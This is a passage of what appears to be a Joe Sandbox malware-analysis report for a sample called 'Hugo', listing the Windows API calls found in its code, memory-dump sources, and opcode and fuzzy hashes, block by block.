                                                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FA9A72
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00FA9ABA
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00FA9AF0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2864067406-0
                                                                                                                                                                                                              • Opcode ID: 8295acdf2dfd3cb639aae72ef527f78d1bec83b5b61beab365edff4746f8fc2e
                                                                                                                                                                                                              • Instruction ID: 369041fb65d9e79243b38f38a33519d569868c442c79266ef411187a616b4839
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8295acdf2dfd3cb639aae72ef527f78d1bec83b5b61beab365edff4746f8fc2e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39219F75A00018AFCF258F94CC98EEE7BB9EB4A360F444166F9068B161D7B99950FB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00FADC30), ref: 00F7DBA6
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F7DBB5
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F7DBC4
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FADC30), ref: 00F7DC21
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2267087916-0
                                                                                                                                                                                                              • Opcode ID: 056533de76392e9bc5dba534b1d6b08e99f4dd29c1d8d8265c5dfad6e528f717
                                                                                                                                                                                                              • Instruction ID: a7a4e6f0233944ac95df9d7b0e8f27b2aea09c2d747de4e62eef99dc4a5f9e46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 056533de76392e9bc5dba534b1d6b08e99f4dd29c1d8d8265c5dfad6e528f717
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3621A3715043059F8704DF28C88199BBBF8EE96764F508A1EF49DC32A1D730D946EB53
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00FA32A6
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA32C0
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA32CE
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FA32DC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                                                                                              • Opcode ID: 8b7b14ed158695e53d5b8e681aa62d0dfd117ae1a39be8f9cfdea604c058113d
                                                                                                                                                                                                              • Instruction ID: 396dada709e06efe37d4d19d1aef24beba2802943bd36b19a4510509babb4488
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b7b14ed158695e53d5b8e681aa62d0dfd117ae1a39be8f9cfdea604c058113d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A2103B1604115AFD7049F24CC45FAABB95EF82324F24825CF8268B6D2C775ED81D7D0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F796E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F78271,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?), ref: 00F796F3
                                                                                                                                                                                                                • Part of subcall function 00F796E4: lstrcpyW.KERNEL32(00000000,?,?,00F78271,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F79719
                                                                                                                                                                                                                • Part of subcall function 00F796E4: lstrcmpiW.KERNEL32(00000000,?,00F78271,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?), ref: 00F7974A
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F7828A
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F782B0
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F782EB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                                                              • Opcode ID: 905e5d7272eb68d9bc4d888c8c78b89dc726b8d0234bc9b38e252ee0f064803e
                                                                                                                                                                                                              • Instruction ID: 7323a53083d2746dfd0a58c6fbe0fb895decff9904a33d949d4d23dcb89ad826
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 905e5d7272eb68d9bc4d888c8c78b89dc726b8d0234bc9b38e252ee0f064803e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11297A200341ABCB146F38DC48E7A77A9FF457A0B10802BF906C7250EF71D802E752
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 00FA615A
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA616C
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA6177
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA62B5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 455545452-0
                                                                                                                                                                                                              • Opcode ID: 8efc94b77b49ea8eeb75dfc2ba07d408ad319c5b76d4073a01154dbfd6c28ef1
                                                                                                                                                                                                              • Instruction ID: 4b9874749b8d42d5737a832ccd17e4376e18d145fb9620435e4ddc939a7aebb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8efc94b77b49ea8eeb75dfc2ba07d408ad319c5b76d4073a01154dbfd6c28ef1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD11B4B6A002089ADF20DF659C84AEE7BACEF17770F14402AF911D5181EB74DA41EA60
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 76bb3c9bf065445efd54d0e6e243be690a683328fb065d0766fcf1278aec4f30
                                                                                                                                                                                                              • Instruction ID: f73a821e06add4b9646beab198f19e9b8392c21f13d6c8c51d35585bb7c3ab28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76bb3c9bf065445efd54d0e6e243be690a683328fb065d0766fcf1278aec4f30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9701A2B2A0921A7EF661267C6CC0F277B9DDF413B8B740336BD21A11D1EE648C40B160
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00F72394
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F723A6
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F723BC
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F723D7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: d8e1b7f05bfe908b7c6240de4c8f059b0c3edb29ea3653b8ce5c89b48f1d2d00
                                                                                                                                                                                                              • Instruction ID: f0b262f9b90274b6e7cda214ac281d45174545d730c673afb4f8c49032dd371d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8e1b7f05bfe908b7c6240de4c8f059b0c3edb29ea3653b8ce5c89b48f1d2d00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7811097AD00218FFEB119BA5CD85F9DBB78FB08750F204096EA05B7290D6716E50EB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F11AF4
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00F531F9
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00F53203
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00F5320E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4127811313-0
                                                                                                                                                                                                              • Opcode ID: 6449dcdb4e5a9692d4a0641d6a8c0cccdb7c5e68d58878bfe49ec97d493575b0
                                                                                                                                                                                                              • Instruction ID: 71891ee8edd71ec1e68690cc4a18fe590d2532de0675d4fe06cc33f4051f8f9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6449dcdb4e5a9692d4a0641d6a8c0cccdb7c5e68d58878bfe49ec97d493575b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23113A72A01119ABCB00EFA8CD859EE7BB8FF05351F100452EA02E2141D778BA91FBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00F7EB14
                                                                                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00F7EB47
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F7EB5D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F7EB64
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2880819207-0
                                                                                                                                                                                                              • Opcode ID: b1d884398cc6af54f014d8efbd793071b12e2c44c0d2cd942bcd4d629cbf1e00
                                                                                                                                                                                                              • Instruction ID: 74974046007622efd2d26a425600e73c0e56a8324ee69d38eac8f31da028e765
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1d884398cc6af54f014d8efbd793071b12e2c44c0d2cd942bcd4d629cbf1e00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B112BB290025CBFDB019FAC9C45A9F7FADEB4A320F048257F816D72A0D674C904AB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,00F3D369,00000000,00000004,00000000), ref: 00F3D588
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F3D594
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F3D59B
                                                                                                                                                                                                              • ResumeThread.KERNEL32(00000000), ref: 00F3D5B9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 173952441-0
                                                                                                                                                                                                              • Opcode ID: a1734ce5d9e4bec5d28477c4059bf5dcbdc0311b2c109b36770d8cdc18b1b83f
                                                                                                                                                                                                              • Instruction ID: d84e7e3d35b5ce4d5168edd7c8b9afbb72955dab95403738d0b49533823409d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1734ce5d9e4bec5d28477c4059bf5dcbdc0311b2c109b36770d8cdc18b1b83f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3601F572805218BBDB116FA5FC05BAA7B69EF82335F140229F926861E0DB708804F6A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F178B1
                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00F178C5
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F178CF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                                                              • Opcode ID: 046e6e9af82f03e07d0fe0366f302765336da1c122d0a07339d30ea7abe2ccc9
                                                                                                                                                                                                              • Instruction ID: 0d3e9e979b8c34c1cf3452ad0a6d586c52309076916400ada08457a697672ef0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 046e6e9af82f03e07d0fe0366f302765336da1c122d0a07339d30ea7abe2ccc9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79115BB2905649BFEF166F90DC58EEABB69FF09364F140115FA1952120DB319CA0FBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00F4338D,00000364,00000000,00000000,00000000,?,00F435FE,00000006,FlsSetValue), ref: 00F43418
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00F4338D,00000364,00000000,00000000,00000000,?,00F435FE,00000006,FlsSetValue,00FB3260,FlsSetValue,00000000,00000364,?,00F431B9), ref: 00F43424
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F4338D,00000364,00000000,00000000,00000000,?,00F435FE,00000006,FlsSetValue,00FB3260,FlsSetValue,00000000), ref: 00F43432
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                              • Opcode ID: dc94ebbf0a10bb95c626596b0b0bcc7c4f782992739f49e52b43dd7d3f83129e
                                                                                                                                                                                                              • Instruction ID: e4d43210b1232e76077fa5bb8e7aeb5e282081b0faccf925fa600889844ce594
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc94ebbf0a10bb95c626596b0b0bcc7c4f782992739f49e52b43dd7d3f83129e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9601A773B11226ABDB22CB799C44AD67FA8BF16B717210620FE06D7590D730DE41E6E0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BA8B
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BAB0
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BABA
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7B69A,?,00008000), ref: 00F7BAED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                                                                                              • Opcode ID: d0c144dfe07bc6131d5d320b8a2c66ec844852145633572cfe390ba91ed8a174
                                                                                                                                                                                                              • Instruction ID: 03ffd6576390a42a3231376bf693ff5d6da942c19a81144ed03d1dba768e542b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0c144dfe07bc6131d5d320b8a2c66ec844852145633572cfe390ba91ed8a174
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B118E71C0152DDBEF00EFE4E9497EEBB78BF0A711F108096D945B2180CB348651EB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00FA888E
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00FA88A6
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00FA88CA
                                                                                                                                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FA88E5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
